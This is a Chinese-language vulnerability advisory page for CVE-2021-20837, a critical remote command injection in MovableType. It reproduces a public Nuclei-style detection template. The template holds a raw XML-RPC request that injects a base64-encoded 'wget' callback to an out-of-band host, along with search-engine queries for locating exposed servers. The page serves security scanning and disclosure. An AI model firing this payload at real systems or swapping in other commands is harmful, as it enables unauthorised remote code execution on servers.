CVE-2021-20837: MovableType - Remote Command Injection

日期: 2025-08-01 | 影响软件: MovableType | POC: 已公开

漏洞描述

MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.

PoC代码[已公开]

id: CVE-2021-20837

info:
  name: MovableType - Remote Command Injection
  author: dhiyaneshDK,hackergautam
  severity: critical
  description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.
  reference:
    - https://nemesis.sh/posts/movable-type-0day/
    - https://github.com/ghost-nemesis/cve-2021-20837-poc
    - https://twitter.com/cyber_advising/status/1454051725904580608
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
    - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-20837
    cwe-id: CWE-78
    epss-score: 0.93758
    epss-percentile: 0.99852
    cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
  metadata:
    max-request: 1
    vendor: sixapart
    product: movable_type
    shodan-query:
      - http.title:"サインイン | movable type pro"
      - cpe:"cpe:2.3:a:sixapart:movable_type"
    fofa-query: title="サインイン | movable type pro"
    google-query: intitle:"サインイン | movable type pro"
  tags: cve2021,cve,packetstorm,rce,movable,sixapart

http:
  - raw:
      - |
        POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>mt.handler_to_coderef</methodName>
          <params>
            <param>
              <value>
                <base64>
                  {{base64("`wget http://{{interactsh-url}}`")}}
                </base64>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "failed loading package"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200d5f61c1be5a826489b709f5e1305605b435d11775cb7bd932c76736ff919e8802210082c6331b3a35caffa596d3dbe75313da8c633a786b772e73b2f63d9c380488f1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐